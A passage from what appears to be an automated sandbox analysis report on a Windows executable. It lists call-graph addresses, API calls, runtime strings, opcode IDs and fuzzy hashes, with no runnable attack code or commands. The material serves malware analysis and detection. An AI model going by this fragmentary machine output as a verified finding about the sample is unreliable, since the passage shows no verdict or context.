7ff75e8e15c6 4101->4102 4103 7ff75e8e1394 2 API calls 4101->4103 4104 7ff75e8e1394 2 API calls 4102->4104 4103->4102 4105 7ff75e8e15d0 4104->4105 4106 7ff75e8e15d5 4105->4106 4107 7ff75e8e1394 2 API calls 4105->4107 4108 7ff75e8e1394 2 API calls 4106->4108 4107->4106 4109 7ff75e8e15df 4108->4109 4110 7ff75e8e15e4 4109->4110 4111 7ff75e8e1394 2 API calls 4109->4111 4112 7ff75e8e1394 2 API calls 4110->4112 4111->4110 4113 7ff75e8e15f3 4112->4113 4113->3599 4114 7ff75e8e149a 4113->4114 4115 7ff75e8e1394 2 API calls 4114->4115 4116 7ff75e8e14a4 4115->4116 4117 7ff75e8e14a9 4116->4117 4118 7ff75e8e1394 2 API calls 4116->4118 4119 7ff75e8e1394 2 API calls 4117->4119 4118->4117 4120 7ff75e8e14b3 4119->4120 4121 7ff75e8e14b8 4120->4121 4122 7ff75e8e1394 2 API calls 4120->4122 4123 7ff75e8e1394 2 API calls 4121->4123 4122->4121 4124 7ff75e8e14c2 4123->4124 4125 7ff75e8e14c7 4124->4125 4126 7ff75e8e1394 2 API calls 4124->4126 4127 7ff75e8e1394 2 API calls 4125->4127 4126->4125 4128 7ff75e8e14d6 4127->4128 4129 7ff75e8e1394 2 API calls 4128->4129 4130 7ff75e8e14e0 4129->4130 4131 7ff75e8e14e5 4130->4131 4132 7ff75e8e1394 2 API calls 4130->4132 4133 7ff75e8e1394 2 API calls 4131->4133 4132->4131 4134 7ff75e8e14ef 4133->4134 4135 7ff75e8e14f4 4134->4135 4136 7ff75e8e1394 2 API calls 4134->4136 4137 7ff75e8e1394 2 API calls 4135->4137 4136->4135 4138 7ff75e8e14fe 4137->4138 4139 7ff75e8e1394 2 API calls 4138->4139 4140 7ff75e8e1503 4139->4140 4141 7ff75e8e1512 4140->4141 4142 7ff75e8e1394 2 API calls 4140->4142 4143 7ff75e8e1394 2 API calls 4141->4143 4142->4141 4144 7ff75e8e1521 4143->4144 4145 7ff75e8e1394 2 API calls 4144->4145 4146 7ff75e8e152b 4145->4146 4147 7ff75e8e1394 2 API calls 4146->4147 4148 7ff75e8e1530 4147->4148 4149 7ff75e8e1394 2 API calls 4148->4149 4150 7ff75e8e153f 4149->4150 4151 7ff75e8e1394 2 API calls 4150->4151 4152 7ff75e8e154e 4151->4152 4153 7ff75e8e1394 2 API calls 4152->4153 4154 7ff75e8e155d 4153->4154 4155 7ff75e8e1394 2 API calls 4154->4155 4156 7ff75e8e156c 4155->4156 4157 7ff75e8e1394 2 API calls 4156->4157 4158 7ff75e8e157b 4157->4158 4159 7ff75e8e1394 2 API calls 4158->4159 4160 7ff75e8e158a 4159->4160 4161 7ff75e8e1394 2 API calls 4160->4161 4162 7ff75e8e1599 4161->4162 4163 7ff75e8e15a8 4162->4163 4164 7ff75e8e1394 2 API calls 4162->4164 4165 7ff75e8e1394 2 API calls 4163->4165 4164->4163 4166 7ff75e8e15b7 4165->4166 4167 7ff75e8e1394 2 API calls 4166->4167 4168 7ff75e8e15c1 4167->4168 4169 7ff75e8e15c6 4168->4169 4170 7ff75e8e1394 2 API calls 4168->4170 4171 7ff75e8e1394 2 API calls 4169->4171 4170->4169 4172 7ff75e8e15d0 4171->4172 4173 7ff75e8e15d5 4172->4173 4174 7ff75e8e1394 2 API calls 4172->4174 4175 7ff75e8e1394 2 API calls 4173->4175 4174->4173 4176 7ff75e8e15df 4175->4176 4177 7ff75e8e15e4 4176->4177 4178 7ff75e8e1394 2 API calls 4176->4178 4179 7ff75e8e1394 2 API calls 4177->4179 4178->4177 4180 7ff75e8e15f3 4179->4180 4180->3599 4180->3610 4182 7ff75e8e1394 2 API calls 4181->4182 4183 7ff75e8e148b 4182->4183 4184 7ff75e8e149a 4183->4184 4185 7ff75e8e1394 2 API calls 4183->4185 4186 7ff75e8e1394 2 API calls 4184->4186 4185->4184 4187 7ff75e8e14a4 4186->4187 4188 7ff75e8e14a9 4187->4188 4189 7ff75e8e1394 2 API calls 4187->4189 4190 7ff75e8e1394 2 API calls 4188->4190 4189->4188 4191 7ff75e8e14b3 4190->4191 4192 7ff75e8e14b8 4191->4192 4193 7ff75e8e1394 2 API calls 4191->4193 4194 7ff75e8e1394 2 API calls 4192->4194 4193->4192 4195 7ff75e8e14c2 4194->4195 4196 7ff75e8e14c7 4195->4196 4197 7ff75e8e1394 2 API calls 4195->4197 4198 7ff75e8e1394 2 API calls 4196->4198 4197->4196 4199 7ff75e8e14d6 4198->4199 4200 7ff75e8e1394 2 API calls 4199->4200 4201 7ff75e8e14e0 4200->4201 4202 7ff75e8e14e5 4201->4202 4203 7ff75e8e1394 2 API calls 4201->4203 4204 7ff75e8e1394 2 API calls 4202->4204 4203->4202 4205 7ff75e8e14ef 4204->4205 4206 7ff75e8e14f4 4205->4206 4207 7ff75e8e1394 2 API calls 4205->4207 4208 7ff75e8e1394 2 API calls 4206->4208 4207->4206 4209 7ff75e8e14fe 4208->4209 4210 7ff75e8e1394 2 API calls 4209->4210 4211 7ff75e8e1503 4210->4211 4212 7ff75e8e1512 4211->4212 4213 7ff75e8e1394 2 API calls 4211->4213 4214 7ff75e8e1394 2 API calls 4212->4214 4213->4212 4215 7ff75e8e1521 4214->4215 4216 7ff75e8e1394 2 API calls 4215->4216 4217 7ff75e8e152b 4216->4217 4218 7ff75e8e1394 2 API calls 4217->4218 4219 7ff75e8e1530 4218->4219 4220 7ff75e8e1394 2 API calls 4219->4220 4221 7ff75e8e153f 4220->4221 4222 7ff75e8e1394 2 API calls 4221->4222 4223 7ff75e8e154e 4222->4223 4224 7ff75e8e1394 2 API calls 4223->4224 4225 7ff75e8e155d 4224->4225 4226 7ff75e8e1394 2 API calls 4225->4226 4227 7ff75e8e156c 4226->4227 4228 7ff75e8e1394 2 API calls 4227->4228 4229 7ff75e8e157b 4228->4229 4230 7ff75e8e1394 2 API calls 4229->4230 4231 7ff75e8e158a 4230->4231 4232 7ff75e8e1394 2 API calls 4231->4232 4233 7ff75e8e1599 4232->4233 4234 7ff75e8e15a8 4233->4234 4235 7ff75e8e1394 2 API calls 4233->4235 4236 7ff75e8e1394 2 API calls 4234->4236 4235->4234 4237 7ff75e8e15b7 4236->4237 4238 7ff75e8e1394 2 API calls 4237->4238 4239 7ff75e8e15c1 4238->4239 4240 7ff75e8e15c6 4239->4240 4241 7ff75e8e1394 2 API calls 4239->4241 4242 7ff75e8e1394 2 API calls 4240->4242 4241->4240 4243 7ff75e8e15d0 4242->4243 4244 7ff75e8e15d5 4243->4244 4245 7ff75e8e1394 2 API calls 4243->4245 4246 7ff75e8e1394 2 API calls 4244->4246 4245->4244 4247 7ff75e8e15df 4246->4247 4248 7ff75e8e15e4 4247->4248 4249 7ff75e8e1394 2 API calls 4247->4249 4250 7ff75e8e1394 2 API calls 4248->4250 4249->4248 4251 7ff75e8e15f3 4250->4251 4251->3615 4253 7ff75e8e1394 2 API calls 4252->4253 4254 7ff75e8e15d0 4253->4254 4255 7ff75e8e15d5 4254->4255 4256 7ff75e8e1394 2 API calls 4254->4256 4257 7ff75e8e1394 2 API calls 4255->4257 4256->4255 4258 7ff75e8e15df 4257->4258 4259 7ff75e8e15e4 4258->4259 4260 7ff75e8e1394 2 API calls 4258->4260 4261 7ff75e8e1394 2 API calls 4259->4261 4260->4259 4262 7ff75e8e15f3 4261->4262 4262->3596 4269 7ff75e8e2320 strlen 4270 7ff75e8e2337 4269->4270 4342 7ff75e8e1000 4343 7ff75e8e108b __set_app_type 4342->4343 4344 7ff75e8e1040 4342->4344 4346 7ff75e8e10b6 4343->4346 4344->4343 4345 7ff75e8e10e5 4346->4345 4348 7ff75e8e1e00 4346->4348 4349 7ff75e8e89b0 __setusermatherr 4348->4349 4350 7ff75e8e1800 4351 7ff75e8e1812 4350->4351 4352 7ff75e8e1835 fprintf 4351->4352 4271 7ff75e8e219e 4272 7ff75e8e2272 4271->4272 4273 7ff75e8e21ab EnterCriticalSection 4271->4273 4274 7ff75e8e2265 LeaveCriticalSection 4273->4274 4276 7ff75e8e21c8 4273->4276 4274->4272 4275 7ff75e8e21e9 TlsGetValue GetLastError 4275->4276 4276->4274 4276->4275

                                                                Executed Functions

                                                                Function 00007FF75E8E1160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1524993811.00007FF75E8E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75E8E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1524946394.00007FF75E8E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525049119.00007FF75E8E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525075365.00007FF75E8EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525119910.00007FF75E8EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525287829.00007FF75EB62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525308121.00007FF75EB64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff75e8e0000_rtYpMDeKUq.jbxd
                                                                Similarity
                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                • String ID:
                                                                • API String ID: 2643109117-0
                                                                • Opcode ID: 0e6ca4d89b91c9777d4e8bda24571358cd04216e07cbc33493341518a02b717e
                                                                • Instruction ID: 138fc9e30248e045c4f60c67d40c74da9f7aec257203eb1fb45a34bf30ce4dd7
                                                                • Opcode Fuzzy Hash: 0e6ca4d89b91c9777d4e8bda24571358cd04216e07cbc33493341518a02b717e
                                                                • Instruction Fuzzy Hash: 3E513631E0974685FA10BB15EB50779B3A1AF88780FCC7479CA5D4F7A2DE6CB8618360
                                                                Function 00007FF75E8E1394 Relevance: 1.5, APIs: 1, Instructions: 24filenativeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • NtOpenFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75E8E1156), ref: 00007FF75E8E13F7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1524993811.00007FF75E8E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75E8E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1524946394.00007FF75E8E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525049119.00007FF75E8E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525075365.00007FF75E8EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525119910.00007FF75E8EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525287829.00007FF75EB62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525308121.00007FF75EB64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff75e8e0000_rtYpMDeKUq.jbxd
                                                                Similarity
                                                                • API ID: FileOpen
                                                                • String ID:
                                                                • API String ID: 2669468079-0
                                                                • Opcode ID: df5726f17078ab6ac065199cd3050d17cfa55e7702da03f535898b72b5525225
                                                                • Instruction ID: af1d261c480bc921c70834f5f8c2ba759054f2eb5881144ae428bb19eb8e75cc
                                                                • Opcode Fuzzy Hash: df5726f17078ab6ac065199cd3050d17cfa55e7702da03f535898b72b5525225
                                                                • Instruction Fuzzy Hash: F0F0C97190CB4682D634EB51FA4003AB7A2FB49380F486839E99C4B725DF3CF1648B60

                                                                Non-executed Functions

                                                                Function 00007FF75E8E3B50 Relevance: 121.3, APIs: 67, Strings: 1, Instructions: 2270COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1524993811.00007FF75E8E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75E8E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1524946394.00007FF75E8E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525049119.00007FF75E8E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525075365.00007FF75E8EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525119910.00007FF75E8EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525287829.00007FF75EB62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525308121.00007FF75EB64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff75e8e0000_rtYpMDeKUq.jbxd
                                                                Similarity
                                                                • API ID: wcslen$memset$wcscat$wcscpy$_wcsnicmp$memcpy$_wcsicmp
                                                                • String ID:
                                                                • API String ID: 3604702941-3916222277
                                                                • Opcode ID: 5cda8b9974547e60dbd6e6c1af034063cd3e71b9d8b8a8d3c99c7329f3a2b3f9
                                                                • Instruction ID: b39eac5bbf7674f16bddbc7abb03b28229869ac206401f6096bc1471456da9c5
                                                                • Opcode Fuzzy Hash: 5cda8b9974547e60dbd6e6c1af034063cd3e71b9d8b8a8d3c99c7329f3a2b3f9
                                                                • Instruction Fuzzy Hash: 8C535E61C2C6C284FB11AB29AA41BF4F360AF95385FCC6339D98C5A5A1EF6D7254C324
                                                                Function 00007FF75E8E3350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1524993811.00007FF75E8E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75E8E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1524946394.00007FF75E8E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525049119.00007FF75E8E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525075365.00007FF75E8EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525119910.00007FF75E8EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525287829.00007FF75EB62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525308121.00007FF75EB64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff75e8e0000_rtYpMDeKUq.jbxd
                                                                Similarity
                                                                • API ID: memset$wcscatwcscpywcslen
                                                                • String ID: $0$0$@$@
                                                                • API String ID: 4263182637-1413854666
                                                                • Opcode ID: 7cd9da10e5ba8d0aa83ba8a4f986f40fee152bd6249f645e56411cb3be7ace2c
                                                                • Instruction ID: 6ffebf6e08132657314257fcaee4f2323a2c9d571699684de25994e81f5d0c7b
                                                                • Opcode Fuzzy Hash: 7cd9da10e5ba8d0aa83ba8a4f986f40fee152bd6249f645e56411cb3be7ace2c
                                                                • Instruction Fuzzy Hash: 49B1C42191C7C285F721AB24E5057BBF7A0FF80348F882139EA8C5AAA5DF7DE155CB50
                                                                Function 00007FF75E8E2690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1524993811.00007FF75E8E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75E8E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1524946394.00007FF75E8E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525049119.00007FF75E8E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525075365.00007FF75E8EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525119910.00007FF75E8EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525287829.00007FF75EB62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525308121.00007FF75EB64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff75e8e0000_rtYpMDeKUq.jbxd
                                                                Similarity
                                                                • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                • String ID: 0$X$`
                                                                • API String ID: 329590056-2527496196
                                                                • Opcode ID: dfb1ef97c4b937f6efb939c327d78c634eb2d4bb8dd394944f45c74ac543e4e5
                                                                • Instruction ID: 41ffac9779a8b9ab41d5088164abb73a04ae4ab3cbb6ccc753948bf398e11c00
                                                                • Opcode Fuzzy Hash: dfb1ef97c4b937f6efb939c327d78c634eb2d4bb8dd394944f45c74ac543e4e5
                                                                • Instruction Fuzzy Hash: A102C132908BC185F720AF15E9007AAB7A4FB857A4F886239DA9C0B7E5DF7CE154C710
                                                                Function 00007FF75E8E1BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • VirtualQuery.KERNEL32(?,?,?,?,00007FF75E8EA4A0,00007FF75E8EA4A0,?,?,00007FF75E8E0000,?,00007FF75E8E1991), ref: 00007FF75E8E1C63
                                                                • VirtualProtect.KERNEL32(?,?,?,?,00007FF75E8EA4A0,00007FF75E8EA4A0,?,?,00007FF75E8E0000,?,00007FF75E8E1991), ref: 00007FF75E8E1CC7
                                                                • memcpy.MSVCRT ref: 00007FF75E8E1CE0
                                                                • GetLastError.KERNEL32(?,?,?,?,00007FF75E8EA4A0,00007FF75E8EA4A0,?,?,00007FF75E8E0000,?,00007FF75E8E1991), ref: 00007FF75E8E1D23
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1524993811.00007FF75E8E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75E8E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1524946394.00007FF75E8E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525049119.00007FF75E8E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525075365.00007FF75E8EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525119910.00007FF75E8EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525287829.00007FF75EB62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525308121.00007FF75EB64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff75e8e0000_rtYpMDeKUq.jbxd
                                                                Similarity
                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                • API String ID: 2595394609-2123141913
                                                                • Opcode ID: 4fcf98ada4743885cf4745be06d9b2b7b53b0b14eeec15d9d77e2cd9606d3f89
                                                                • Instruction ID: acb82c0c3cf72e81a75e2af5e88d87873ca805228cea2d3df0bf314bd2907673
                                                                • Opcode Fuzzy Hash: 4fcf98ada4743885cf4745be06d9b2b7b53b0b14eeec15d9d77e2cd9606d3f89
                                                                • Instruction Fuzzy Hash: 0841B271A0965681FE61AB41DA806B8B7A0EB85BC0F9D653ACD0D8F3A1DE3CF551C320
                                                                Function 00007FF75E8E2104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1524993811.00007FF75E8E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75E8E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1524946394.00007FF75E8E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525049119.00007FF75E8E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525075365.00007FF75E8EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525119910.00007FF75E8EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525287829.00007FF75EB62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525308121.00007FF75EB64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff75e8e0000_rtYpMDeKUq.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                • String ID:
                                                                • API String ID: 3326252324-0
                                                                • Opcode ID: 5bee38b4a5a680de8b18f3cd75628340502d90423a1d8ff5dcf8a878582094de
                                                                • Instruction ID: 7b7eb4c92ffad01ea9d5abf7ebd25fc4e19054c259223cfc250de4a4914cf592
                                                                • Opcode Fuzzy Hash: 5bee38b4a5a680de8b18f3cd75628340502d90423a1d8ff5dcf8a878582094de
                                                                • Instruction Fuzzy Hash: 2121C721E0994285FA66BB01EB50675F260BF15B91FCC3078C90E5BAA0DF6CB9668360
                                                                Function 00007FF75E8E1E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 640 7ff75e8e1e10-7ff75e8e1e2d 641 7ff75e8e1e2f-7ff75e8e1e38 640->641 642 7ff75e8e1e3e-7ff75e8e1e48 640->642 641->642 643 7ff75e8e1f60-7ff75e8e1f69 641->643 644 7ff75e8e1ea3-7ff75e8e1ea8 642->644 645 7ff75e8e1e4a-7ff75e8e1e53 642->645 644->643 646 7ff75e8e1eae-7ff75e8e1eb3 644->646 647 7ff75e8e1e55-7ff75e8e1e60 645->647 648 7ff75e8e1ecc-7ff75e8e1ed1 645->648 649 7ff75e8e1eb5-7ff75e8e1eba 646->649 650 7ff75e8e1efb-7ff75e8e1f0a call 7ff75e8e89c0 646->650 647->644 651 7ff75e8e1f23-7ff75e8e1f2d 648->651 652 7ff75e8e1ed3-7ff75e8e1ee2 signal 648->652 649->643 653 7ff75e8e1ec0 649->653 650->651 662 7ff75e8e1f0c-7ff75e8e1f10 650->662 656 7ff75e8e1f43-7ff75e8e1f45 651->656 657 7ff75e8e1f2f-7ff75e8e1f3f 651->657 652->651 654 7ff75e8e1ee4-7ff75e8e1ee8 652->654 653->651 658 7ff75e8e1f4e-7ff75e8e1f53 654->658 659 7ff75e8e1eea-7ff75e8e1ef9 signal 654->659 656->643 657->656 661 7ff75e8e1f5a 658->661 659->643 661->643 663 7ff75e8e1f55 662->663 664 7ff75e8e1f12-7ff75e8e1f21 signal 662->664 663->661 664->643
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1524993811.00007FF75E8E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75E8E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1524946394.00007FF75E8E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525049119.00007FF75E8E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525075365.00007FF75E8EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525119910.00007FF75E8EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525287829.00007FF75EB62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525308121.00007FF75EB64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff75e8e0000_rtYpMDeKUq.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CCG
                                                                • API String ID: 0-1584390748
                                                                • Opcode ID: 981209e0ac3ddb0b4a096b9b655f1816affae7da42ff6b0e70024d2a530dabbb
                                                                • Instruction ID: 282e019df8cdac9275c2f89fecf3f066f1f7d53a5593ea5c0643195c508f2bd1
                                                                • Opcode Fuzzy Hash: 981209e0ac3ddb0b4a096b9b655f1816affae7da42ff6b0e70024d2a530dabbb
                                                                • Instruction Fuzzy Hash: 1521B021F0D60681FA787224979037DB1819F88764FACA539DA1D4F3D4CE2CBCA182F1
                                                                Function 00007FF75E8E1880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 665 7ff75e8e1880-7ff75e8e189c 666 7ff75e8e1a0f-7ff75e8e1a1f 665->666 667 7ff75e8e18a2-7ff75e8e18f9 call 7ff75e8e2420 call 7ff75e8e2660 665->667 667->666 672 7ff75e8e18ff-7ff75e8e1910 667->672 673 7ff75e8e1912-7ff75e8e191c 672->673 674 7ff75e8e193e-7ff75e8e1941 672->674 675 7ff75e8e191e-7ff75e8e1929 673->675 676 7ff75e8e194d-7ff75e8e1954 673->676 674->676 677 7ff75e8e1943-7ff75e8e1947 674->677 675->676 681 7ff75e8e192b-7ff75e8e193a 675->681 679 7ff75e8e1956-7ff75e8e1961 676->679 680 7ff75e8e199e-7ff75e8e19a6 676->680 677->676 678 7ff75e8e1a20-7ff75e8e1a26 677->678 684 7ff75e8e1a2c-7ff75e8e1a37 678->684 685 7ff75e8e1b87-7ff75e8e1b98 call 7ff75e8e1d40 678->685 682 7ff75e8e1970-7ff75e8e199c call 7ff75e8e1ba0 679->682 680->666 683 7ff75e8e19a8-7ff75e8e19c1 680->683 681->674 682->680 688 7ff75e8e19df-7ff75e8e19e7 683->688 684->680 689 7ff75e8e1a3d-7ff75e8e1a5f 684->689 692 7ff75e8e19d0-7ff75e8e19dd 688->692 693 7ff75e8e19e9-7ff75e8e1a0d VirtualProtect 688->693 694 7ff75e8e1a7d-7ff75e8e1a97 689->694 692->666 692->688 693->692 697 7ff75e8e1a70-7ff75e8e1a77 693->697 695 7ff75e8e1b74-7ff75e8e1b82 call 7ff75e8e1d40 694->695 696 7ff75e8e1a9d-7ff75e8e1afa 694->696 695->685 702 7ff75e8e1b22-7ff75e8e1b26 696->702 703 7ff75e8e1afc-7ff75e8e1b0e 696->703 697->680 697->694 702->697 706 7ff75e8e1b2c-7ff75e8e1b30 702->706 704 7ff75e8e1b10-7ff75e8e1b20 703->704 705 7ff75e8e1b5c-7ff75e8e1b6f call 7ff75e8e1d40 703->705 704->702 704->705 705->695 706->697 707 7ff75e8e1b36-7ff75e8e1b53 call 7ff75e8e1ba0 706->707 707->705
                                                                APIs
                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF75E8E1247), ref: 00007FF75E8E19F9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1524993811.00007FF75E8E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75E8E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1524946394.00007FF75E8E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525049119.00007FF75E8E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525075365.00007FF75E8EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525119910.00007FF75E8EC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525287829.00007FF75EB62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1525308121.00007FF75EB64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff75e8e0000_rtYpMDeKUq.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                • API String ID: 544645111-395989641
                                                                • Opcode ID: 35077ec1f8cf01a8bdaf316ebed73980ffe83aab56c7039b9b06064fa5820d5c
                                                                • Instruction ID: c4bda129bf857f4f7a3dfaace728684b1d608f1f4fff2c7654ebd7b0123c1ae7
                                                                • Opcode Fuzzy Hash: 35077ec1f8cf01a8bdaf316ebed73980ffe83aab56c7039b9b06064fa5820d5c
                                                                • Instruction Fuzzy Hash: BA517F71F08646C6EF10AB25DA407B8B761AB04B94F886139D92C0F7A4DE7CF8A1C720
                                                                Function 00007FF75E8E1800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
